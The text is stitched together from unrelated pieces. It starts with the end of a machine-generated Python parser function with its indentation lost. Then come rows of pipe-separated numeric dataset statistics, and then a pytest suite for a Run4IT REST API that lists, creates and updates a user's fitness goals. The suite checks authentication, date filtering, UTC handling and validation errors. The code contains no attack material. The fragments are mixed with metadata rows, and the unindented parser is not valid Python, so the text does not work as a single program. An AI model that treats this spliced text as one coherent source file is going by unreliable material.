lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 16):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 34):
lcl_6 = parse_Attrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_4_check = lcl_7
lcl_7 = _slot_4_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_4_check
else:
lcl_8 = _slot_4_check[1]
lcl_8 = lcl_8
_slot_4 = lcl_8
lcl_8 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_5 = lcl_8
lcl_8 = (_slot_5 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'EOF not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4, _slot_5)
lcl_9 = prim__mk__ast('START', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 6):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 5):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 27):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 7):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 22):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 21):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 38):
lcl_6 = parse_Attrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_4_check = lcl_7
lcl_7 = _slot_4_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_4_check
else:
lcl_8 = _slot_4_check[1]
lcl_8 = lcl_8
_slot_4 = lcl_8
lcl_8 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_5 = lcl_8
lcl_8 = (_slot_5 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'EOF not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4, _slot_5)
lcl_9 = prim__mk__ast('START', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
else:
lcl_6 = (_off_3, 'START lookahead failed')
lcl_6 = prim__cons(lcl_6, prim__nil)
lcl_6 = lcl_6
lcl_6 = (False, lcl_6)
lcl_4 = lcl_6
lcl_3 = lcl_4
else:
lcl_4 = (_off_3, 'START got EOF')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
lcl_2 = lcl_3
lcl_1 = lcl_2
lcl_0 = lcl_1
return lcl_0
return parse_START
| 48.714329
| 2,057
| 0.361479
| 16,453
| 162,170
| 2.956482
| 0.010576
| 0.048846
| 0.073083
| 0.043562
| 0.961187
| 0.952038
| 0.941348
| 0.926814
| 0.923524
| 0.920646
| 0
| 0.076475
| 0.586354
| 162,170
| 3,328
| 2,058
| 48.728966
| 0.648664
| 0.000432
| 0
| 0.926195
| 1
| 0.000302
| 0.018402
| 0.000679
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005445
| false
| 0
| 0.00121
| 0
| 0.012099
| 0.000302
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b8105f044bd0c345fcc7906e6aad85e8cd9fcd89
| 19,850
|
py
|
Python
|
tests/test_resource_profile_goal.py
|
andraune/Run4IT_BackEnd
|
a481427a0d1189a1f08c42e7ac1b452af6bbfc8d
|
[
"MIT"
] | 1
|
2022-03-29T06:11:20.000Z
|
2022-03-29T06:11:20.000Z
|
tests/test_resource_profile_goal.py
|
andraune/run4it_backend
|
a481427a0d1189a1f08c42e7ac1b452af6bbfc8d
|
[
"MIT"
] | null | null | null |
tests/test_resource_profile_goal.py
|
andraune/run4it_backend
|
a481427a0d1189a1f08c42e7ac1b452af6bbfc8d
|
[
"MIT"
] | null | null | null |
import pytest
import datetime as dt
from run4it.api.goal import ProfileGoalListResource, ProfileGoalResource, GoalCategoryModel, GoalModel
from .helpers import get_response_json, register_confirmed_user, register_and_login_confirmed_user, get_authorization_header
@pytest.mark.usefixtures('db')
class TestProfileGoalListResource:
    """Tests for ProfileGoalListResource: listing goals (with filters) and creating goals."""

    # strftime pattern producing the API's explicit-UTC timestamp format.
    TIME_FMT = "%Y-%m-%dT%H:%M:%S+00:00"

    def setup(self):
        """Register two categories and five goals (ids 1-5) owned by profile 1."""
        cat1 = GoalCategoryModel('RunDistance', 'km')
        cat1.save(commit=False)
        cat2 = GoalCategoryModel('Weight target', 'kg')
        cat2.save()
        now = dt.datetime.utcnow()
        # id=1: future goal
        future_goal = GoalModel(1, cat1, now + dt.timedelta(days=2), now + dt.timedelta(days=3), 0, 2, 0)
        future_goal.save(commit=False)
        # id=2, id=3: currently active goals
        active_goal1 = GoalModel(1, cat1, now + dt.timedelta(days=-2), now + dt.timedelta(days=1), 0, 2, 1)
        active_goal2 = GoalModel(1, cat2, now + dt.timedelta(days=-2), now + dt.timedelta(days=2), 70, 68, 68)
        active_goal1.save(commit=False)
        active_goal2.save(commit=False)
        # id=4: expired and incomplete, id=5: expired and complete
        expired_goal1 = GoalModel(1, cat1, now + dt.timedelta(days=-10), now + dt.timedelta(days=-2), 0, 2, 0)
        expired_goal2 = GoalModel(1, cat1, now + dt.timedelta(days=-8), now + dt.timedelta(days=-3), 0, 2, 2)
        expired_goal1.save(commit=False)
        expired_goal2.save()

    def _get_goals_as_jonny(self, api, client, **url_kwargs):
        """Register/login 'jonny' and GET the goal list; return (status_code, parsed json)."""
        token, _ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
        url = api.url_for(ProfileGoalListResource, username="jonny", **url_kwargs)
        response = client.get(url, headers=get_authorization_header(token))
        return response.status_code, get_response_json(response.data)

    def _post_goal_as_creator(self, api, client, data):
        """Register/login 'creator' and POST *data* to the goal list; return the raw response."""
        token, _ = register_and_login_confirmed_user(api, client, "creator", "creator@user.no", "pwd")
        url = api.url_for(ProfileGoalListResource, username="creator")
        return client.post(url, data=data, headers=get_authorization_header(token))

    def test_content_type_is_json(self, api, client):
        url = api.url_for(ProfileGoalListResource, username="jonny")
        response = client.get(url)
        assert(response.headers["Content-Type"] == 'application/json')

    def test_get_goals_not_logged_in(self, api, client):
        url = api.url_for(ProfileGoalListResource, username="jonny")
        response = client.get(url)
        response_json = get_response_json(response.data)
        assert(response.status_code == 401)
        assert(response_json["errors"]["auth"] is not None)

    def test_get_goals_logged_in(self, api, client):
        status, response_json = self._get_goals_as_jonny(api, client)
        assert(status == 200)
        assert(len(response_json) == 2)
        assert(response_json[0]['id'] == 2)  # active goals is default
        assert(response_json[1]['id'] == 3)

    def test_get_goals_filter_active(self, api, client):
        status, response_json = self._get_goals_as_jonny(api, client, filter="active")
        assert(status == 200)
        assert(len(response_json) == 2)
        assert(response_json[0]['id'] == 2)
        assert(response_json[1]['id'] == 3)

    def test_get_goals_filter_future(self, api, client):
        status, response_json = self._get_goals_as_jonny(api, client, filter="future")
        assert(status == 200)
        assert(len(response_json) == 1)
        assert(response_json[0]['id'] == 1)

    def test_get_goals_filter_expired(self, api, client):
        status, response_json = self._get_goals_as_jonny(api, client, filter="expired")
        assert(status == 200)
        assert(len(response_json) == 2)
        assert(response_json[0]['id'] == 4)
        assert(response_json[1]['id'] == 5)

    def test_get_goals_filter_completed(self, api, client):
        status, response_json = self._get_goals_as_jonny(api, client, filter="completed")
        assert(status == 200)
        assert(len(response_json) == 1)
        assert(response_json[0]['id'] == 5)

    def test_get_goals_filter_incompleted(self, api, client):
        status, response_json = self._get_goals_as_jonny(api, client, filter="incompleted")
        assert(status == 200)
        assert(len(response_json) == 1)
        assert(response_json[0]['id'] == 4)

    def test_get_goals_duration(self, api, client):
        status, response_json = self._get_goals_as_jonny(api, client, filter="incompleted")
        assert(status == 200)
        assert(response_json[0]['duration'] == 8)  # goal 4 spans days -10..-2

    def test_get_goals_category(self, api, client):
        status, response_json = self._get_goals_as_jonny(api, client, filter="incompleted")
        assert(status == 200)
        assert(response_json[0]['categoryName'] == 'RunDistance')
        assert(response_json[0]['categoryUnit'] == 'km')

    def test_create_goal_not_logged_in(self, api, client):
        url = api.url_for(ProfileGoalListResource, username="jonny")
        response = client.post(url)
        response_json = get_response_json(response.data)
        assert(response.status_code == 401)
        assert(response_json["errors"]["auth"] is not None)

    def test_create_future_goal(self, api, client):
        datetime_start = dt.datetime.utcnow() + dt.timedelta(days=2)
        startAt = datetime_start.strftime(self.TIME_FMT)
        duration = 4
        endAt = (datetime_start + dt.timedelta(days=duration)).strftime(self.TIME_FMT)
        response = self._post_goal_as_creator(api, client, {
            "duration": duration, "startValue": 11.2, "targetValue": 23.4,
            "startAt": startAt, "categoryID": 1})
        response_json = get_response_json(response.data)
        assert(response.status_code == 200)
        assert(response_json["id"] == 6)  # five created in setup
        assert(response_json["startAt"] == startAt)
        assert(response_json["endAt"] == endAt)
        assert(response_json["duration"] == duration)
        assert(response_json["startValue"] == 11.2)
        assert(response_json["targetValue"] == 23.4)
        assert(response_json["categoryName"] == "RunDistance")
        assert(response_json["categoryUnit"] == "km")
        assert(response.headers["Location"] == api.url_for(ProfileGoalResource, username="creator", goal_id=6, _external=True))

    def test_create_ongoing_goal(self, api, client):
        datetime_start = dt.datetime.utcnow() - dt.timedelta(days=2)
        startAt = datetime_start.strftime(self.TIME_FMT)
        duration = 4
        endAt = (datetime_start + dt.timedelta(days=duration)).strftime(self.TIME_FMT)
        response = self._post_goal_as_creator(api, client, {
            "duration": duration, "startValue": 11.2, "targetValue": 23.4,
            "startAt": startAt, "categoryID": 1})
        response_json = get_response_json(response.data)
        assert(response.status_code == 200)
        assert(response_json["startAt"] == startAt)
        assert(response_json["endAt"] == endAt)
        assert(response_json["duration"] == duration)

    def test_create_expired_goal(self, api, client):
        # start 6 days ago with a 4-day duration -> already ended, must be rejected
        datetime_start = dt.datetime.utcnow() - dt.timedelta(days=6)
        startAt = datetime_start.strftime(self.TIME_FMT)
        response = self._post_goal_as_creator(api, client, {
            "duration": 4, "startValue": 11.2, "targetValue": 23.4,
            "startAt": startAt, "categoryID": 1})
        response_json = get_response_json(response.data)
        assert(response.status_code == 422)
        assert(response_json["errors"]["goal"][0] == "Goal already expired")

    def test_create_goal_with_startvalue_equal_to_target_value(self, api, client):
        datetime_start = dt.datetime.utcnow() + dt.timedelta(days=2)
        startAt = datetime_start.strftime(self.TIME_FMT)
        response = self._post_goal_as_creator(api, client, {
            "duration": 4, "startValue": 11.2, "targetValue": 11.2,
            "startAt": startAt, "categoryID": 1})
        response_json = get_response_json(response.data)
        assert(response.status_code == 422)
        assert(response_json["errors"]["goal"][0] == "Goal target value equals start value")

    def test_create_goal_with_nonexistant_category(self, api, client):
        datetime_start = dt.datetime.utcnow() + dt.timedelta(days=2)
        startAt = datetime_start.strftime(self.TIME_FMT)
        response = self._post_goal_as_creator(api, client, {
            "duration": 4, "startValue": 11.2, "targetValue": 12.2,
            "startAt": startAt, "categoryID": 99})
        response_json = get_response_json(response.data)
        assert(response.status_code == 422)
        assert(response_json["errors"]["goal"][0] == "Goal category not found")

    def test_create_goal_with_non_utc_startdate(self, api, client):
        now = dt.datetime.utcnow()
        # midnight today with an explicit +02:00 offset; the API should normalize to UTC
        datetime_start = dt.datetime(now.year, now.month, now.day, tzinfo=dt.timezone(dt.timedelta(hours=2)))
        startAt = datetime_start.strftime("%Y-%m-%dT%H:%M:%S%z")
        utcStartAt = (datetime_start - datetime_start.utcoffset()).strftime(self.TIME_FMT)
        duration = 4
        utcEndAt = (datetime_start - datetime_start.utcoffset() + dt.timedelta(days=duration)).strftime(self.TIME_FMT)
        response = self._post_goal_as_creator(api, client, {
            "duration": duration, "startValue": 11.2, "targetValue": 12.2,
            "startAt": startAt, "categoryID": 1})
        response_json = get_response_json(response.data)
        assert(response.status_code == 200)
        assert(response_json["startAt"] == utcStartAt)
        assert(response_json["endAt"] == utcEndAt)
@pytest.mark.usefixtures('db')
class TestProfileGoalResource:
def setup(self): # register some goals
cat1 = GoalCategoryModel('RunDistance', 'km')
cat1.save(commit=False)
cat2 = GoalCategoryModel('CrawlDistance', 'm')
cat2.save()
now = dt.datetime.utcnow()
future_goal = GoalModel(1, cat1, now + dt.timedelta(days=2), now + dt.timedelta(days=3), 0, 2, 0)
future_goal.save(commit=False)
active_goal = GoalModel(1, cat1, now + dt.timedelta(days=-2), now + dt.timedelta(days=1), 0, 2, 1)
active_goal.save(commit=False)
expired_goal = GoalModel(1, cat1, now + dt.timedelta(days=-10), now + dt.timedelta(days=-2), 0, 2, 0)
expired_goal.save()
def test_content_type_is_json(self, api, client):
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
response = client.get(url)
assert(response.headers["Content-Type"] == 'application/json')
def test_get_goal_not_logged_in(self, api, client):
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
response = client.get(url)
response_json = get_response_json(response.data)
assert(response.status_code == 401)
assert(response_json["errors"]["auth"] is not None)
def test_get_goal_logged_in(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=2)
response = client.get(url, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(response_json["id"] == 2)
def test_get_nonexistant_goal(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=99)
response = client.get(url, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 404)
assert(response_json["errors"]["goal"] is not None)
def test_get_goal_for_another_user(self, api, client):
register_confirmed_user("test", "test@test.com", "pwd")
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=2)
response = client.get(url, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 404)
assert(response_json["errors"]["goal"] is not None)
def test_update_goal_not_logged_in(self, api, client):
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
response = client.put(url)
response_json = get_response_json(response.data)
assert(response.status_code == 401)
assert(response_json["errors"]["auth"] is not None)
def test_update_goal_for_another_user(self, api, client):
register_confirmed_user("test", "test@test.com", "pwd")
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=2)
now = dt.datetime.utcnow()
newStartAt = now.strftime("%Y-%m-%dT%H:%M:%S+00:00")
newDuration = 1
response = client.put(url, data={ "duration":newDuration, "startValue":1.2, "targetValue":2.1, "startAt": "{0}".format(newStartAt), "categoryID":2 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 422)
assert(response_json["errors"]["goal"] is not None)
def test_update_future_goal(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
now = dt.datetime.utcnow()
newStartAt = now.strftime("%Y-%m-%dT%H:%M:%S+00:00")
newDuration = 1
newEndAt = (now + dt.timedelta(days=newDuration)).strftime("%Y-%m-%dT%H:%M:%S+00:00")
response = client.put(url, data={ "duration":newDuration, "startValue":1.2, "targetValue":2.1, "startAt": "{0}".format(newStartAt), "categoryID":2 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(response_json["id"] == 1)
assert(response_json["startAt"] == newStartAt)
assert(response_json["endAt"] == newEndAt)
assert(response_json["duration"] == 1)
assert(response_json["startValue"] == 1.2)
assert(response_json["targetValue"] == 2.1)
assert(response_json["categoryName"] == "CrawlDistance")
assert(response_json["categoryUnit"] == "m")
def test_update_ongoing_goal(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=2)
now = dt.datetime.utcnow()
newStartAt = now.strftime("%Y-%m-%dT%H:%M:%S+00:00")
newDuration = 1
response = client.put(url, data={ "duration":newDuration, "startValue":1.2, "targetValue":2.1, "startAt": "{0}".format(newStartAt), "categoryID":2 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(response_json["id"] == 2)
def test_update_expired_goal(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=3)
now = dt.datetime.utcnow()
newStartAt = now.strftime("%Y-%m-%dT%H:%M:%S+00:00")
newDuration = 1
response = client.put(url, data={ "duration":newDuration, "startValue":1.2, "targetValue":2.1, "startAt": "{0}".format(newStartAt), "categoryID":2 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 422)
assert(response_json["errors"]["goal"][0] == "Goal already expired")
def test_update_goal_with_nonexisting_category(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
now = dt.datetime.utcnow()
newStartAt = now.strftime("%Y-%m-%dT%H:%M:%S+00:00")
newDuration = 1
response = client.put(url, data={ "duration":newDuration, "startValue":1.2, "targetValue":2.1, "startAt": "{0}".format(newStartAt), "categoryID":22 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 422)
assert(response_json["errors"]["goal"][0] == "Goal category not found")
def test_update_goal_with_non_utc_timestamp(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
now = dt.datetime.utcnow()
datetime_start = dt.datetime(now.year, now.month, now.day, tzinfo=dt.timezone(dt.timedelta(hours=2)))
utcStartAt = (datetime_start - datetime_start.utcoffset()).strftime("%Y-%m-%dT%H:%M:%S+00:00")
new_duration = 3
utcEndAt = (datetime_start - datetime_start.utcoffset() + dt.timedelta(days=new_duration)).strftime("%Y-%m-%dT%H:%M:%S+00:00")
response = client.put(url, data={ "duration":new_duration, "startValue":1.2, "targetValue":2.2, "startAt": "{0}".format(utcStartAt), "categoryID":2 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(response_json["startAt"] == utcStartAt)
assert(response_json["endAt"] == utcEndAt)
def test_update_goal_with_startvalue_equal_to_endvalue(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
now = dt.datetime.utcnow()
newStartAt = now.strftime("%Y-%m-%dT%H:%M:%S+00:00")
newDuration = 1
response = client.put(url, data={ "duration":newDuration, "startValue":1.2, "targetValue":1.2, "startAt": "{0}".format(newStartAt), "categoryID":2 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 422)
assert(response_json["errors"]["goal"] is not None)
def test_post_goal_not_supported(self, api, client):
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
response = client.post(url)
assert(response.status_code == 405) # not allowed
def test_delete_goal_not_supported(self, api, client):
    """DELETE on a single-goal resource is not an allowed method."""
    url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
    assert client.delete(url).status_code == 405  # method not allowed
| 54.98615
| 193
| 0.735466
| 2,751
| 19,850
| 5.095238
| 0.061796
| 0.09674
| 0.064208
| 0.027395
| 0.909253
| 0.876222
| 0.876079
| 0.868089
| 0.861383
| 0.851537
| 0
| 0.023451
| 0.104181
| 19,850
| 360
| 194
| 55.138889
| 0.764818
| 0.006448
